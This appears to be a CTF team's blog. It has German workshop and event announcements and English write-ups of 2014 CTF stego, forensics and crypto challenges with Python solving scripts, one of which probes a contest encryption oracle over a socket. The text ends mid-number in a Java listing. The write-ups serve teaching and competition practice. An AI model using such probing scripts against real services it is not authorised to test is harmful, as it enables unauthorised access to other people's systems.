CTF-Workshop Oktober 2014

September 5, 2014

This page is intentionally left german.

Nach den letzten erfolgreichen Workshops, für die wir viel positives Feedback bekommen haben, wollen wir auch im kommenden Wintersemester wieder einen Kompakt-Workshop zum Thema Hacking und CTF-Wettbewerbe veranstalten. Der Termin für diesen Workshop ist das Wochenende vom 10. bis 12. Oktober.

Wir, das sind die squareroots, das 2006 gegründete Hacking-Team der Uni Mannheim, welches regelmäßig an weltweiten IT-Sicherheits-Wettbewerben (so genannten Capture the Flag Wettbewerben) teilnimmt. Zu uns gehören hauptsächlich Studenten verschiedener Einrichtungen (u.a. Uni, DHBW, HS MA) und Fachrichtungen, aber auch andere Interessierte.

Im Rahmen der Veranstaltung wird den Teilnehmern eine Einführung in verschiedene Arten von Schwachstellen, die sowohl im simulierten Hacking-Wettbewerb als auch in echten Webdiensten auftauchen, gegeben. Zusätzlich präsentieren wir den Teilnehmer eine strukturierte Heransgehensweise für die Teilnahme an CTF-Wettbewerben. Die Teilnehmer lernen außerdem Grundlagen in der Benutzung der Linux-Konsole sowie die Automatisierung von Abläufen in Python. Abgerundet wird der Workshop am Sonntagnachmittag mit einem echten CTF-Wettbewerb, in dem die Teilnehmer in Teams gegeneinander antreten.

Nach aktuellen Stand werden wir am Freitag eine Einführung in Linux und die Konsole geben. Im Anschluss findet ein Get-Together mit den Teilnehmern statt, in dem wir euch gerne etwas kennenlernen wollen. Den Samstag widmen wir dann den “harten Fakten” und präsentieren einleitend JavaScript, Command- und SQL-Injections sowie grundlegendes zum Thema Reguläre Ausdrücke. Der Sonntag steht dann im Zeichen des CTF-Wettbewerbs. Dort erklären wir euch, wie man im CTF Abläufe automatisieren kann und wie die erste Stunde im CTF abläuft. Am Nachmittag veranstalten wir dann einen CTF, bei dem die Teilnehmer der in Teams gegeneinander antreten.

Prinzipiell gibt es keine Beschränkungen, was Betriebssysteme angeht. Für den Linux-Teil des Kurses werden wir euch Resourcen zur Verfügung stellen. Sicherlich schadet es aber nicht, wenn ihr für den Abschluss-CTF eine Live-CD bzw. einen Live-USB-Stick mit Linux dabei habt, da sich manche Dinge unter Windows nicht ganz so einfach erledigen lassen. Für Mac-User sollte das nicht notwendig sein.

Ihr solltet euch Freitag ab 19 Uhr und Samstag/Sonntag (11./12.) ca. 10 – 19 Uhr freihalten. Der Zeitplan folgt in kürze.

Der Kurs richtet sich explizit nicht ausschließlich an Studenten der Uni Mannheim, sondern auch an Studenten der anderen Mannheimer Hochschulen und alle aus dem Großraum Rhein-Neckar, die sich für IT-Sicherheit interessieren. Sofern ihr Fragen habt, schreibt bitte eine E-Mail an Johannes (sqrts@anmeldung.sqrts.de).

Anmeldungen sind ab sofort möglich auf http://anmeldung.sqrts.de/!

Diese Veranstaltung wird in Kooperation mit der Arbeitsgruppe Theoretische Informatik und IT-Sicherheit der Universität Mannheim durchgeführt.

0

HITCON CTF 2014: Puzzle

August 18, 2014

This is the picture we got:

SONY DSC

After downloading, I opened the picture with an image viewer and saved it again, only to compare the file sizes. As expected the original is much larger than the just saved one. Then I opened it in stegesolve to make sure I don’t miss anything. By looking at the image with an hex editor I noticed a lot of JFXX Strings. So I let the program search for the jpg header FFD8, which gave me 102 results. In order to extract those images I wrote a small program:

f = open('puzzle.jpg','r')
d = f.read()
f.close()

o = ""
j = 0
for i in range(len(d)):
   if d[i] == '\xff' and d[i+1] == '\xd8':
      o = d[i:]
      f = open(str(j)+'.jpg','w')
      f.write(o)
      f.close()
      j += 1

So that’s the puzzle (combined picture):

out2

But I didn’t want to solve the puzzle in Paint by hand, so I let python do this work for me and search the matching neighbour to a given image and side.

values = {}
ima = Image.open(sys.argv[1]+'.jpg')
da = ima.load()
sa = ima.size
for i in range(2,101):
    imb = Image.open(str(i)+'.jpg')
    sb = imb.size
    db = imb.load()
    z = 0
    for x in range(sa[1]):
        if sys.argv[2] == "l":
            a = da[0,x]
            b = db[sa[0]-1,x]
        elif sys.argv[2] == "t":
            a = da[x,0]
            b = db[x,sa[1]-1]
        elif sys.argv[2] == "r":
            a = da[sa[0]-1,x]
            b = db[0,x]
        else: #bottom
            a = da[x,sa[1]-1]
            b = db[x,0]

        y = abs(a[0]-b[0])+abs(a[2]-b[2])+abs(a[2]-b[2])
        z += y
    values[str(i)+'.jpg'] = z
sorted_values = sorted(values.iteritems(), key=operator.itemgetter(1))
print sorted_values[0]

 

A team member mentioned that the key is propably in the sky as something can be seen there in the puzzle pictures.
After some time putting the images together I got this:

puzzlediff

Here we can read “HITCON” and “ounT”. Another team member found the original image, so we could use the image combiner in stegsolve which gave us finally this:

solved

Flag: HITCON{mounTAIn_jEPg_I01}

0

squareroots @ GPN14

June 19, 2014

This post intentionally left german.

Draußen ist es warm, die Lüfter drehen laut und … in Karlsruhe wird Gulasch gekocht. Es ist wieder Zeit für die Gulaschprogrammiernacht des Entropia e.V..
Dieses Jahr veranstalten wir in diesem Rahmen einen CTF mit coolen Preisen, die das Herz jeder Haeckse und jedes Hackers höher schlagen lassen.

Beginnen werden wir am Freitag den 20. Juni 2014 um 16:00 im blauen Salon mit einigen grundlegenden Informationen, im Anschluss geht es direkt los. Zeit ist bis ca. 23:00 am Samstag (21. Juni 2014).

Wir lassen dann mal die Server booten und freuen uns auf euch :)

2

ASIS CTF 2014: Blocks (Stego 100)

May 16, 2014

This challenge comes with an 361x361px large image—that’s 19×19 squares of 19x19px each.

Every square is either black or white. After analyzing the alpha-planes, a hidden pattern can be found in Alpha plane 0.
This second pattern contains 19×19 squares of 1x1px.

For the next step we scaled down the first image to match the 19x19px size of the second pattern.
Then we converted each image to a binary file row-wise by setting a bit to 0, if a pixel is black and to 1, if it is white, starting in the upper left corner.

Finally we used this Python-script to perform a bitwise exclusive or operation on the nth byte of each of the files and then combining the result to a string.
This gave us the flag ASIS_08213db585ffe1c93c8f04622c319594

a = open('inner.bin', 'rb')
x = a.read()

b = open('outer.bin', 'rb')
y = b.read()

print ''.join([chr(ord(a) ^ ord(b)) for a,b in zip(x,y)])

Output:

flag = ASIS_08213db585ffe1c93c8f04622c319594
0

ASIS CTF 2014: forensic

May 13, 2014

After extracting in this challenge we get an arguably big pcap file. As usual the problem here is to look for just anything helpful.

A valid option in challenges like this, is just looking for all the files that were downloaded, which you can either do with wireshark by “Exporting objects” which is quite tiresome in this particular challenge, because of the big amount of files that got requested throughout the session.
The other option is to look for the “conversations” in the capture and sort by packet length, which I finally did after a long time of scrolling through hundreds of useless packets…

001

So the largest file in this capture, was a file named “myfile” downloaded from a rather unusual port of a server, that is no longer reachable (and also in the same subnet as the client. Interesting!).
It seems we are lucky, the file at least looks interesting as it is another pcap file. Unfortunately wireshark can’t open that one without some fixing beforehand.
I’m sure there are many ways to actually look at the capture file but I just downloaded a program called “pcapfix” which worked quite well. After fixing the file, wireshark was able to open it.

My joy from finding this file faded when I saw roughly another 20000 captured packets. However remembering how I found that file I opted to do just the same thing again: looking at the conversations and sorting by packet length.

002

Now that’s very interesting, a telnet conversation and some huge files. Even though the telnet conversation seems interesting at first, it is not really useful…
However there are still the other three files and indeed, after some time of looking up what port/protocol was used for transferring them and what kind of files we were dealing with, we find out that the three big files are postscript-files.

When opening those files, one file tells us the flag in ASCII art:

003
Thanks to Michael for writing this writeup :)

2

ASIS CTF 2014: Random Image

May 11, 2014

This crypto-challenge was appointed with 150 points. A very nice task – kudos to the guys from ASIS for organizing the ctf. About the task: when downloading and unziping the file you’ll get two things:

  • A picture enc.png
  • A python script color-crypto.py

The image only contains random noise or at least does not resemble anything.
The python-script reveals the task:

#!/usr/bin/env python

import Image
import random

def get_color(x, y, r):
    n = (pow(x, 3) + pow(y, 3)) ^ r
    return (n ^ ((n >> 8) << 8 ))
flag_img = Image.open("flag.png")
im = flag_img.load()
r = random.randint(1, pow(2, 256))
print flag_img.size

enc_img = Image.new(flag_img.mode, flag_img.size)
enpix = enc_img.load()

for x in range(flag_img.size[0]):
    for y in range(flag_img.size[1]):
        t = random.randint(1, pow(2, 256)) % 250
        enpix[x,y] = t

for x in range(flag_img.size[0]):
    for y in range(flag_img.size[1]):
        if im[x,y] < 250 :
            s = get_color(x, y, r)
            enpix[x,y] = s

enc_img.save('enc' + '.png')

So it seems that our goal is to restore the original flag.png file.
First we take a look at the two loops: the first one is filling a new image
(having the same dimensions as the flag.png) with random monochrome values.
The second loop is iterating over every pixel in the flag.png. Should the
color-value of a pixel be smaller than 250 (i.e. it is not white),
the result of the get_color method is written at the position of the current
pixel.

We therefore have to analyze the get_color method. It is taking
three arguments: the x and y position of a pixel and a random number r.
r is set at the beginning of the script and contains a random
256-Bit Integer. The method basically then is calculating the sum of
the cubes of x and y, XOR-ed with r. Then it returns the 8 lowest
Bits of this number.

In order to get the original image we  have to do the following:

  1. get to know the value of r used to generate the enc.png 
  2. find out which pixels were part of the original image

So in order to find out the value of r  in the original generation of
the image, we XOR-ed every color-value of each pixel with the lowest 8
Bits of the sum of cubes of the pixel-cordinates. This results in:

(x^3 + y^3) XOR (x^3 + y^3) XOR r

We thus are ending up with only the value of r. As we do not know,
which pixels were calculated that way, we stored the result in a dict with the results as the key and the count as the value.
The value with the most occurrences was then chosen. With ~ 28000
ocurences compared to ~ 300 with the other pixels we determined r to
be 61.

The second part was straight-forward: just use the above calculations
for each pixel again and check if it results in 61. Should this be the
case draw a black pixel at the current position. This resulted in the flag:

flag

Here is our code:

#!/usr/bin/env python

import Image
import random
import sys
from collections import defaultdict
import operator

flag_img = Image.open(sys.argv[1])
im = flag_img.load()
enc_img = Image.new(flag_img.mode, flag_img.size)

rd = defaultdict(int)
nope = flag_img.size[0]*flag_img.size[1]

new_flag = Image.new("RGBA", flag_img.size)
new_flag_im = new_flag.load()

for x in range(flag_img.size[0]):
	for y in range(flag_img.size[1]):
		pix = im[x,y] % 256
		n = (pow(x, 3) + pow(y, 3))
		r = pix ^ (n % 256)
		if r == 61:
			new_flag_im[x,y] = (0, 0, 0, 255)
		else:
			new_flag_im[x,y] = (0, 0, 0, 0)
		rd[r] += 1

sortrd = sorted(rd.iteritems(), key=operator.itemgetter(1))
for k,v in sortrd:
	print "%03d %.3f %d" % (k, float(v)/float(nope)*100.0, v)

new_flag.save("new_flag.png")
0

ASIS CTF 2014: Tortureous sound

May 11, 2014

After downloading and extracting we got a file which was identified as:

$~/asis2014$ file steg_75_235fdd4c364c6d58d79bb6e6fad45ef7
steg_75_235fdd4c364c6d58d79bb6e6fad45ef7: ISO Media, MPEG v4 system, version 2

Ok this looks like an audio or video file. Lets try to open it with a media player.
Great we can open it, and hear that typical SSTV sound. Ok let’s open RX-SSTV and replay the audio file.

Because we did this part so far on a MacBook Pro and RX-SSTV does not run properly within a windows VM, we used another computer running Windows with RX-SSTV and connected them via audio cable.

The first picture we got was this:

2014-05-08_22.36.45

Ok, this looked kind of strange, but in the center it looks like a QR code. Maybe we can tweak it a little bit in audacity. When we opend it in audacity, we noticed there are 5 audio lines, which were played together.
asis2014_audacity

So lets play each audio track seperately and record it with RX-SSTV. So we got these 5 pictures:

2014-05-08_22.41.08

2014-05-08_22.40.20

2014-05-08_22.43.19

SSTV-08May2014-224726

2014-05-08_22.44.28

Apart from the troll face we now can clearly see four parts of the QR code, in the center of each picture. After we cut the parts and merged them, as we thought the need to be ordered, we tried to scan the QR code. But unfortunatelly it didn’t work. :(

Ok lets studiy the QR code article on wikipedia. The timing pattern is there and valid. The version and format information is there, too. We wondered ourself a bit about the low error correction, but ok. After studying the QR code for almost 2 hours, we agreed that we need to get it done without writing a QR code parser ourself. Since the timing pattern was correct we would only mirror the three position images together on the top left to bottom right diagonal line, and then add the alignment part in the bottom right. Maybe we needed to flip the alignment image.

When i tried to scan it with my mobile and it took some seconds, i thought ok lets take a look at another task, but suddenly a md5 sum appeared. 

Screenshot_2014-05-10-19-21-47

So the flag is: ASIS_83c37934407754f81e9e2f98ff3d231f
And this is the QR code: QR

That was a great challenge, unfortunately only worth 75 points.

0

VolgaCTF 2014 Writeup: crypto100

April 2, 2014

In this task, we have got a ciphertext and an oracle that we can use to encrypt data.

Looking at the ciphertext we can see that is a big big number.

Time to test the oracle: connect to the server and we’re greeted with “enter your text”. After entering some text, the ciphertext is diplayed and the connection is closed.

First thing to check: is the server deterministic? (if not, it would have been much harder ;) After entering the same text several times and checking that the result is always the same, it is safe to presume that the same input will always produce the same ciphertext.

Let’s do some simple tests:


a -> 4
A -> 4
aa -> 32
aaa -> 4096
aaaa -> 33554432

From here we can recognize a pattern, they are power of 2:


a -> 4 = 2 ^ 2
A -> 4 = 2 ^ 2
aa -> 32 = 2 ^ 5
aaa -> 4096 = 2 ^ 12
aaaa -> 33554432 = 2 ^ 25

if we try b:


b -> 9
bb -> 243
bbb -> 531441

Same story, this time they are power of 3


b -> 9 = 3 ^ 2
bb -> 243 = 3 ^ 5
bbb -> 531441 = 3 ^ 12

The exponents are the same (2,5,12)
Now let’s try to combine them

ab -> 108 = 2 ^ 2 * 3 ^ 3

It looks like as the text is parsed, each character is assigned a value and an exponent depending on its position and they are finally multiplied together to get the ciphertext.
Back to the simple tests in order to test the exponents:


aa -> 32 = 2 ^ 5 = 2 ^ 2 * 2 ^ 3
bb -> 243 = 3 ^ 5 = 3 ^ 2 * 3 ^ 3

It looks like the character on the first position get the exponent 2, the second 3

Now let’s get all the values assigned to the letters: (uppercase/lowercase get the same number, as found out earlier)


a 4
b 9
c 49
d 169
e 841
f 3481
g 16129
h 58081
i 237169
j 942841
k 3798601
l 15124321
m 60668521
n 242393761
o 969637321
p 3880916209
q 15519428929
r 62091170761
s 248333785561
t 993388962721
u 3973472129449
v 15893864597521
w 63575410549561
x 254301737879281
y 1017208928926369
z 4068831250586881

We can see here (at least for the first few results) that they are squares of prime number. So now let’s factorize the ciphertext to find the used characters. I tried using cryptool/wolfram alpha but the ciphertext was too long, so let’s use java!
The program is pretty simple, we already have the factors, we just have to check if they divide the ciphertext and find out the exponent to get the positions.

To do that I first wrote a python script to get the factors and write java code to add them in a hashmap:

import socket
import math
host = "tasks.2014.volgactf.ru"
port = 28121

for c in string.ascii_letters:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))

    s.recv(512) # Enter your text
    s.send(str(c))
    # we want to print f.put(new BigInteger("2"), "a");
    print "f.put(new BigInteger(\"" + str(math.sqrt(int(s.recv(512))))[:-2],"\")+\"",c + "\");"
    s.close()

and then we copy the results in our java code

import java.math.BigInteger;</pre>
import java.util.HashMap;
import java.util.Map;
public class factor {

 public static void main(String[] args) {

BigInteger a = new BigInteger("1514765623131713617459556538106
 84871397330397970803964157890849387650112917147634181313332638
 47777147694345930421865759581971941044761090127202436952324075
 19555096275871062265136903919060624420134568714147502110665582
 76649177886654573148749166456099375406862608921741728567308452
 02505366088847392830185433917950801681441833781305020812970618
 46382912525374183460533475309291097420351095927471695171202282
 39337187514365426664124300334841502680816933430002745575692188
 92035827515684031384174804578667554000859440931211000701335216
 87311338315292119817031532633779724916113075933148504070584901
 91466848201020623533366384802020041171893290272341675266455599
 09948449349099455723152423342998618998360092083307452668661743
 68494994679847546695494389011694217273064784375738196021730106
 32907498020165380636987597296234416241014507624996071347082081
 77645363274404322919568601436075031668812612517173079542339517
 87365604166062877305225111964416600118081175782668621364516318
 49885345327975380958774242926016130735610552935260872840734552
 26098988688363567358523543266556364531849923060533779454750776
 24546614887862978389529514466690768457594111737110852623827922
 42761152579786601678635128137729318118585182294349366721272954
 15397278993744475532738196987872916399676054332569567611410931
 85132866433223312515444807816150338017846822007937548831965683
 51747187086365522689796884955440824635660495322470608551998749
 99547790423265719782491282739985515848437342122413897207926405
 05743119629910566349820925930971588148021911908738750313842702
 05445673657238331818619371899180014704807708719052589673507845
 58039885315270126943613701888976869319290160639388379724942430
 75189464918475377941937873499438314475780988689058426365454898
 13683542366378577257747004802694332978684009390962191518195890
 57228277132101286192788240996125510247101046172900091786770477
 17924782218502361336516399934155248150153070886933940697848033
 44795708828751159757078712262445915682844884172337862738416316
 10120563750273988859880079642619423288313640413952710709053477
 20350289772105948025956007555898774454828125504547347138524511
 44851152190250710935267647780053213599651597645893218462850978
 62949305601726429624245687986436920828275398069592252340256231
 43999290913779733500792203364133398502560556115267763829026410
 18458427253284766191777969076553520490413042476821381731778085
 45109387032040028176627807073358729723985136167995333957141029
 93609038163889550502482116118617178640756024638837398095161515
 49959558124223649690859217612616807950320944247942858681660597
 23317435755605005908352655502001074784152751484675911190548073
 51301224430734932200534148854176617712620580747538066097603743
 92124371969951902961990088499030070298631813421950576748163392
 94030769833920873770254222560086331664614940070811701458294747
 35609545873027470645035460983227524583401862678894469966775106
 79989533675463114384823222374083589055409136779083332737806734
 63484573013346986961013852154076926397757813642241370419513375
 88041663569501919990761157599488016221902905933789464802175239
 79581653604225300226534203281499181971061426531598057513438644
 76513339029583541850289083714412921592608374849926151739981010
 93578825231802791122816948448099383019068279782934438400524016
 84303244672285388934654401387160925443000035030466435789899102
 58944193852525080468200391924771018476547823416505917027682266
 92864258988946326479267993832594934220625222558656482665136796
 88855639428338710425625314668342459731516725372885040819366871
 78216298540836504104185639717412493880705711917985690742738155
 78807016457048792581919799798405201492884022951629717055951993
 52848083017454039899516982674315238420783925815488524041074631
 33794812280958738386992745975425321837602834801859764341926353
 98246438656224196449459449992236049123831870757127292922015022
 23224727796082668516848827010557206385391252701109933621000158
 49293307043674960989988018457347102167673393118727648695584874
 03339040007721347292854711444566459623375768392836711868117022
 61894408151025378664917281822392438943883099792174485742283256
 57776705844049368707250412936076733420731060107577472891517646
 22265028406115563788611611509394973124580265567696159859636594
 38101476668204489301581013087414080650382253916338493335993052
 85804134137708571328863011986377157121085435445640257982337028
 53523972623252475990952427934944324010045096296201927828018514
 96956439556539864319390460529223929029400638763291359750227958
 93378999212574581400159199799498860302488784609683059245306988
 67862083342717501402017989463372107182275671379976080601729433
 07568874208973477429496890817103636555164095449064553698326703
 20133578139877566874497156089821928219744305673562317602597926
 56955942210189905868122904714436764106869210353759937520533297
 20119872858755201033780483206779650561461746521971594167667739
 95621723820431329232471610349117348377384250032869764552505721
 28602732122844129457586312891867820419378497162534187935178877
 51693800095905505398645209920769367848344086298599500607443271
 00700975124429510971693150242260747360415432562789547708703295
 76320708142258762710080818020867010309380671773464022263031945
 11022485095352848406314942083231911346145345272589955920988814
 30250816485612713029391325097551845682217131929713999471675897
 66960762665204122460480272970765201209881765925866886620965751
 48792547283737786281741973363989735460409566758825399868200257
 75273349923190974822821071289928529963786812793630539525526252
 54083373262881279929582685501133681610838873734662659958845291
 50239799423314089905684505501831378102480362138529698456794380
 20337746186483307941766990237999474556389718293560431140427155
 47975121109393586395350562139212037030509427209038135641438168
 83331805746170819941451126902143019425370791117261332510661635
 76021452440473863867391661111974731013635311939212318904804434
 70671351673842286779657975154005404552946495840424807413659013
 94477694041598359467002401143183775480199661636243602085590090
 95586663251979260777047507321774618363947776544998034192394176
 62124596593240559311174936256805311666746946424272353739520312
 87258264031833211181830012704242216974428762740091259111255665
 62214801108911761420664948769581167636954904892855219869570596
 13835648768976897556723124688293035211612951255030511072514989
 34548295055210992193768225426854621735057715984354975897243683
 53152623714778552840620929107763529528263965914679215483700264
 41550644898936416905392424084779261152801039771309245678350346
 85389434613407708988883516682021406849808855222113919957152446
 64350754788579268984361994370766624419329029290518841925000143
 96477619070576407445980608083597253024644857859174137251912691
 19613941156397738161983652432227806916443185601739628389246342
 94291777596428054236799015806447471568222235302880507128677151
 96844999217363019498969858736730249397268931835380954887872594
 08325841118314608941129973379459271615415689143861963043601717
 74341637045559090973579501921767281665656636269810982358075388
 01123457816105038997772255031070508867834320901569241352813859
 89173411666346821351566079227164579979491355421275921526370727
 77614130573674307387347940978386524473199977728198503463097640
 92632119886084608884972074116969860038548338249846159404220369
 67685459857303691874010994737214817665256253966761284017169169
 70720884852062594607503721682126981518918228587469406015624278
 32848991573446828519481115831184444657088151547852218814642642
 85735828063881294333250965540810801568458545836239432536451867
 44307774326155253859730278728587166429249520741703586557302963
 06381795863694425824090662520621867133053703675417537205447742
 61758594786563189227531175043960243763539369022413585571165412
 47862591805172305249454955889966053112780670671945376371841017
 46250983084522680880452268348195387085696636186694268870618466
 48852448141826136162537862259471653078478996079168395434966525
 96428891793282912834366251207449496822628463248971224711544781
 90873359351690586409177320324681269824646839713334162068413710
 60428896565509313789149476986884165672495143499406139798231965
 29242055986415662780177412020113829660781181590623799951228426
 70091132066043023574944111324998697063320423556416400502984069
 28306411475113692531992874342378202622070246093394831012872898
 28376519231524928062779389591249569309480365401732759589089542
 49028616541415503863452487862170886682014064065178405115221612
 67521701347958818904420474071907333131594563210725309449939815
 28041374376201450547127708263440538066931031738884113324727169
 52642049983236269163576664317768722060253738126052987218119519
 45625634106007028818638634029503828919402476253516563438025994
 43344271403811226084873960966466117170468192139167011698596216
 01222898031806162780767045160224497544487210764179364095476013
 36376253925702454947715525418058910360273790114084271780801023
 79219457482929330967443329151088598054832701944036313070907950
 18980664762709883517161407738037836458594286182579609132843720
 60296775911123821901830653966427378550526847611814199290044168
 78082919470947070907842263199586229207692648085205963461249038
 59055309417220172881566425708025755526916503064077001475286929
 42944032729334368854444944973109363327235393715141322743997288
 93829360106959866742483685590109697375547053382769516796795851
 86222733921646673336256101642875868683395132421203142725546679
 71667219866113752954519386126582355078533329685589380520822364
 88949891077224725412532705482507377837897482887073610579984881
 08828995814138829400274214453391310595617141591186675976224308
 21144542920148101826194969754114659754589455945921058397007946
 21761569614667492654650532684081599697637423085036388134243766
 70594109105323930326413346087456979586974945421724976483773922
 59990848151063395018083243798209220842231827946649279176171707
 16183889345524704121100787685820191289040794251343045611441159
 05439727770349760091997287483920161653596565866229562321230146
 87579188494258116345599005755122792771440612431595906550629061
 56503884778898700523353996855431458603574329285525521552918898
 22286601407406838519567631054647677934263506750784334757454280
 55198581684144117674890671993155132643470358784564045627415170
 26200767438513565563470918364916801592476640593601654732561720
 53160355639393301698355623751148061092014887651438308258367680
 66184259203884863685239182556375507240398619196901825339481832
 48111644878736423890188240289275410126789979961240738159257863
 42184126129522452479759525173506107252431178783100570501185315
 89627503100109706295563555546481648512154758541527982866608179
 74223548032505645313389036875275497984658623361371767404706692
 62335659456320007173910632799258165417716316182563719923305409
 38798393372791716432659853761607401710473616907113656288363254
 35372767562748797237959496652890416819009569948532494587078223
 58049961765869518170393499746717530264178798330270245594379517
 12345830117721660365069674712012021474114891618876900243436938
 51968195507480364561629337870163516469327858534132585787855275
 58224631767236474005525505708774239533452134403236872635008454
 06513907589800479292637542798831674535689937443859218932595099
 43418083548892699144947178664863304479449239661959336167962892
 52505768979010806617054428526579753881293468229543881230747128
 89196350646876679093630097284916787848734780974449994281532373
 77477179852909088422684424080693520558332803551980861542847905
 47440175711354238576051037506678824805852645087705698436106307
 00354251808854686512671031287204309368368692621291265789699669
 68719369811558603329149830061504425285576779308212532333404166
 14882809398881888031225550445493970100238919560738474781603041
 02963268165562008051699369021850481312499908743951758350037795
 68130617221711648709801148436567351104074197320326679791283483
 78770995464695985319340981059720622170061195862275602277450961
 95336569577411451338317323641636741643284855126333552571124028
 05686348221921151557673614150457927683402782476221001888065661
 03719632099345051241550436685803517811735463498799332171059546
 39944253981609300763675784091133047952168944509630466648918705
 73010459175407339704587709550855235681045034983498641354483783
 61018941839350241891841669476865499397339268269975325478583636
 44103163702388005009940408109263266710116454919527403290210696
 57059602453857876056348549860552332288704052722144400587826215
 60960945723231242767435679976315990600961793582288724800566764
 48502571830495694407357263398809315393041128523556684604972256
 68545302438221804155945214149267985528544233895183048331739935
 10222641788288095991297495829473840939009602954289977680648821
 36014576540643894355441865217432262685735352972494313570421721
 92754592633406509457242898735680211920696652468186589917754528
 97898065755392187798661392636537860866521999822976989721152502
 88742033583081582383494772611093037698471286925040550588678671
 11998700412130622688519207283004823430888603158559001235454229
 81421803069849173896361125886845489635579538629147091469695924
 22073714434717922740337290992570606827694385712894670878896994
 82091071963866985999492978264406775319539980133231046735684390
 90669407572783331404103750235343908069307772348860509728050301
 07643999638411651850122656779027899770721453524003864797357149
 79166538869960720633480355211858350716139576663628906757142523
 60933033326150128464218122058029170212080409361043253244172166
 41749645644362607101321737119451160468936035560562675517909894
 66340274993369148362753559138729214015731016870902323774731888
 39590230134045315761310212915276414498030673673598241901179452
 46862220926317777984442404208402261201195454018930124853724155
 70156022445573448805803908238870565954163108682767544828192380
 05720064176727195003274864585559454463467393885558711357176824
 81569990055822960476881046331624616121629500878738753046671845
 72405118898990617157176426781772742316483714197125312635501718
 05224176923549158896454608919928455623497898830358132816149549
 43179951148030592975251844413071125243942134853626141138661928
 90630506445549858421522228678591492801069921038724952804877005
 03870032846680388244930958551568658060222355841767546814929808
 43717846613340320809815414471674250458649502238355448155210177
 98641947705317869833338745918326435743117194762385468101144485
 55811175476788769118497250671349261052108328458703629742950707
 58171985893935875662480010368493408897490104153666856352509918
 81779019876677613889270158119912159126899498237975977282780929
 40844129558968643299869889748475149703667116066221575084687891
 66691184984192461242413490971173827127339868092570627220808000
 43271172461564100170986735199323684304380367958768205297785114
 48236481634965809517246028432852618886341986050120710700362244
 42805233017780851825522662697048846477125229500646449290004894
 62847778016227351598258366433749185012647405012099641844816789
 75765356185281843258403321090871405995901171658136224675673763
 85162520479795853232199356410146089990802841432324923513705547
 59573404004024663344427757928200374456891932334623432185498226
 28967384348461360762374467157205148901669703846990952381723176
 72148207354604520772809090640090651152856924977443576912466935
 51342146529991878376574028214382516331243443081859571869514424
 31055537592386569539541601546696419685926376265452161647128694
 19070404511464275024739306939618963297935777956646731961123696
 43967064307389317730978880286884033066762666097938349748706488
 80719883266584667196497134275894754734645287727052967882760476
 76876180102482741675566239342774518669170759125078447876156215
 51182519045223703543787608716658123228103582345715097518708215
 84661090635440733739137039748145275925056567418208070413536066
 39785161723227139841071585474721379075560768941229152491041976
 67070868904137979548998611487561173818979581709181038931351029
 17250224205090117841765742094514366879606726224048657380462011
 07305767757337809170148074296600948306444211532833236887235532
 17381074878448469948185789280996518742222891937466207424306605
 72038343541849170014666136731295753731101287430178234603221590
 25720525310330200642647031767659423589644021983640770746082236
 48792669303513690080851812039581868193627526754470613281285534
 16172710833991472421411194172246616139726245057469472453935814
 13437639618363572298396232619974638177415018933434001477108239
 89413733429768675552594726668479961828726434444206384667962069
 59649471204031240349124173644750574982337468815085912300485417
 81036636103942400333047729526420116153598595035512660335384236
 55215182960371058895463701616777554130790996373573325846828559
 09250524801902614804481678074419588264975010802605233484194650
 02773249227169286751644328554521862334020697588449708908864337
 52578543704322856271894630500988293664441087781140453524301178
 79169833182647795389445753305609571733882783984627696296833140
 08002056295325514027489807717552233237160246526976618182327338
 84854098750085568073773950591094637270631802284207542059228574
 54759323470477977138473103231183818889465199479190217486743642
 06135139028327447412192156016518297255320881967799153384536094
 52852761969673708777767767479590594598322997997574975507035504
 67089773448933726590606788309282102968546180824168161705336317
 75180970357438689931567452610847415810162626742289995530469566
 05697492923504972673439016535567778872182764272570696331791440
 24211456449051729795985791117391124498849467877635620659855471
 29648351488629531606522390373818769591317304423929967568365388
 71343969290912947534941567832088746295021879673977975665458184
 42493222326110904096494778737492648991458855268045467370977187
 70644858866654958378399482041044042975694254147901112651369014
 71800337462484725614633663047737406735738009100376183083344736
 24716084373230670883310201638998955381783736839323427308592090
 79329418292612895043433161003280328083144487604845772220337221
 60347423878183937802954813959743097498556037882259593214082865
 70051584444076322432140343607551923910312344694747789985684798
 26085870713289181335548766144731670859168899790869996834615023
 04143551040091285213651363526748228780003323023038751501681797
 22945633169095626009452032840167267946913626722710513908894036
 24802701185403771263685080473189220718316966772994788571889318
 94370074574973047315063182732047852031326708960333107140943608
 21626008868139165263934553520716382826554344636312522254218320
 84820495640865487753945579964299687300515669563603175461250874
 78306252382505834084327077140585341014461307454782937016513953
 58625983024475013561756096972986698594430987420966243680016385
 35887404320115751433630672474775193767316616493455744094103805
 86886997416599817821139318954768218388174915078299202201359614
 07845496545287547578741957779590905662059061574198058551992552
 58428905247886850265254681110943033184258883795140733630089483
 04723131215593352165648200902911452871512929587820602191030776
 29043698505664442017880916769737723384755561344446663104134298
 85280404052326827074467638408111002000856722905233809996308855
 56004571573605178186344634143973346404351336273264315903113861
 64374309917497773913657746940543461924829222385468846157689347
 38393940857800977573057036431616695306530668114735972923359546
 00652500550876730767078970777600645765984036516710718620963903
 54031790818395171516371706875537403661909691333243560712065193
 87979777566174648472261439315795530750901304606354660605631184
 84032146137189972044139778142885233628680415575269807674056055
 36104355491670756562528352948407678653340301973772351447906192
 98363331326417592703111854471596112923066057081148387988024947
 19491997820683575850219395652005241246857610036153930223614072
 11081705510811900688126371440156785399419088832158623478682861
 36473448427295865786755915855774059392524092663081844542060738
 25512910342084233317422043857387580338792190938923868285414668
 96611571637522306121883609693209555783941136483662917937601569
 41383478399731788089890185444918605174129762419745171811821499
 71031388188330960115973199208942677296090981328822337375199562
 83711933519619611692124465802516242301461555387163047376709301
 60341890198160638914636062287441842616782974018547690311415108
 36539365405718004781497869939388601612732295993718228332079834
 34850790259063778271162128204960633897554991259156810084159855
 28242206560042141061928233292484022646419317439135461235600538
 79034800787323705365531814431303634306974825837183475788796236
 54316533547960777238977633407484563346760058541432214916568645
 23742577486995897661477572713366352066296586224195267531169299
 27229075029339754654620667320543655744140199980582875067699116
 80390856873903760846710445180138744383599841706320397312965549
 17565291298278164261242483817029692893788167736816915617846403
 17466580786212351899852444932936135787262771891058696196407405
 04235064805387012008016330220537784672443567077943238934261562
 66553948283309604944884696554260352506301250259723629214624837
 59913240653118410121690802125553756278418124154236976068094299
 94209681338974317968151532295899192329620747829367420640714203
 64846360359313325249443359696252954456192411081238501737141470
 91280117842195952850249565329749086092028027870941105113032159
 84876903874102335939990299042490489327496308837555966435396788
